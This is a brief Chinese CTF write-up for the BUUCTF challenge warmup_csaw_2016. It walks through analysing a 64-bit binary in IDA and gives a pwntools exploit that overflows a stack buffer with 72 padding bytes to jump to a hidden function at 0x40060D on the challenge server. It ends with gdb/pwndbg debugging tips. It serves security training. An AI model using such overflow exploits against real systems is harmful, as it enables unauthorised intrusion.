【BUUCTF】warmup_csaw_2016
题目一:【BUUCTF】warmup_csaw_2016
1、题目描述:
2、下载附件,在kali中分析,64位,小端存储
3、使用ida64分析文件,找到main函数,F5反汇编
4、这里有两个数组都是64字节,在sprintf这里,将sub_40060D函数的地址存放在s中。
5、查看函数sub_40060D,地址
6、构造exp
from pwn import *
sh = remote("node5.buuoj.cn",28532)
sub_addr = 0x40060D
payload = b'a'*72+ p64(sub_addr)
sh.sendline(payload)
sh.interactive()
7、运行:
--------------------------------------
tip:dbg命令
01、使用gdb工具
02、使用pwndbg,在主函数处进行断点:
03、权限不够时,添加权限就可以
04、使用r命令运行程序
05、使用n命令单步调试